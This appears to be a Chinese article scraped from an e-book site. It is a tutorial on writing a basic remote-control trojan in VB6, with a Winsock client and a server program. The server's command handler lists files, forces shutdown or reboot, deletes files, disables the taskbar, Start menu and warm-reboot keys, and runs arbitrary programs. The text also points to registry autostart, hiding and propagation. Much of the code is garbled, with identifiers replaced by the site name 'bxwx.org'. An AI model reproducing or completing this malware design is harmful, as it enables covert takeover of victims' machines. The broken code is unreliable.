淺淡vb6_super紅客-愛下電子書

淺淡vb6

bo又稱「特洛伊木馬」，是在美國一次黑客技術討論會上由一個黑客組織推出的。它其實是一種客戶機/伺服器程序，其利用的原理就是：在本機直接啟動運行的程序擁有與使用者相同的許可權。因此如果能夠啟動伺服器端（即被攻擊的計算機）的伺服器程序，就可以使用相應的客戶端工具客戶程序直接控制它了。下面來談談如何用vb來實現它。

----使用vb建立兩個程序，一個為客戶端程序client，一個為伺服器端程序systry。

----在client工程中建立一個窗體，載入winsock控制項，稱為tcpclient，協議選擇tcp，再加入兩個文本框，用以輸入伺服器的ip地址或伺服器名，然後建立一個按鈕，按下之後就可以對連接進行初始化了，代碼如下：

privatesubcmdconnect_click

len(bxwx.org)=0andlen(bxwx.org)=0then

msgbox("請輸入主機名或主機ip地址。")

exitsub

else

len(bxwx.org)>0thebxwx.org=bxwx.org

elsbxwx.org=bxwx.org

end

endibxwx.org

bxwx.org=true

endsub

----連接建立之後就可以使用dataarrival事件處理所收到的數據了。

----在伺服器端systry工程也建立一個窗體，載入winsock控制項，稱為tcpserver，協議選擇tcp，在form_load事件中加入如下代碼：

privatesubform_loabxwx.org=199bxwx.org

endsub

----準備應答客戶端程序的請求連接，使用connectionrequest事件來應答戶端程序的請求，代碼如下：

privatesubtcpserver_connectionrequest

(byvalrequestidlong)

bxwx.orgsckclosedthebxwx.org『檢查控制項的state屬性是否為關閉的。

end'如果不是，在接受新的連接之前先關閉此連接。

bxwx.orgrequestid

endsub

----這樣在客戶端程序按下了連接按鈕后，伺服器端程序的connectionrequest事件被觸發，執行了以上的代碼。如果不出意外，連接就被建立起來了。

----建立連接后伺服器端的程序通過dataarrival事件接收客戶機端程序所發的指令運行既定的程序。如：把伺服器端的驅動器名、目錄名、文件名等傳到客戶機端，客戶機端接收後用treeview控制項以樹狀的形式顯示出來，瀏覽伺服器端文件目錄；強制關閉或重啟伺服器端的計算機；屏蔽任務欄窗口；屏蔽開始菜單；按照客戶機端傳過來的文件名或目錄名，而刪除它；屏蔽熱啟動鍵；運行伺服器端的任何程序；還包括獲取目標計算機屏幕圖象、窗口及進程列表；激活、終止遠端進程；打開、關閉、移動遠端窗口；控制目標計算機滑鼠的移動與動作；交換遠端滑鼠的左右鍵；在目標計算機模擬鍵盤輸入，下載、上裝文件；提取、創建、修改目標計算機系統註冊表關鍵字；在遠端屏幕上顯示消息。dataarrival事件程序如下：

privatesubtcpserver_dataarrival

(byvalbytestotallong)

dimstrdatastring

dimilong

dimmkeystrinbxwx.orgstrdata

『接收數據並存入strdata

fori=1len(strdata)

『分離strdata中的命令

mid(strdata,i,1)=""then

mkey=left(strdata,i-1)

『把命令id號存入mkey

『把命令參數存入strdata

strdata=right(strdata,len(strdata)-i)

exitfor

end

nexti

selectcaseval(mkey)

case1

『驅動器名、目錄名、文件名

case2

強制關閉伺服器端的計算機

case3

強制重啟伺服器端的計算機

case4

屏蔽任務欄窗口；

case5

屏蔽開始菜單；

case6

按照客戶機端傳過來的文件名或目錄名，而刪除它；

case7

屏蔽熱啟動鍵；

case8

運行伺服器端的任何程序

endselect

endsub

詳細程序略。

----客戶機端用bxwx.org發命令。命令包括命令id和命令參數，它們用符號「」隔開。

----另外，當客戶機端斷開與伺服器端的來接后，伺服器端應用tcpserver_close事件，來繼續準備接收客戶機端的請求，其代碼如下：

privatesubtcpserver_closbxwx.org

bxwx.org

endsub

----這就是一個最基本的特洛伊木馬程序，只要你的機器運行了伺服器端程序，那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了，在我的源程序中有一中方法，是修改系統註冊表的方法。

----成功的特洛伊木馬程序要比這個複雜一些，還有程序的隱藏、自動複製、傳播等問題要解決。警告：千萬不要用bo程序破壞別人的系統。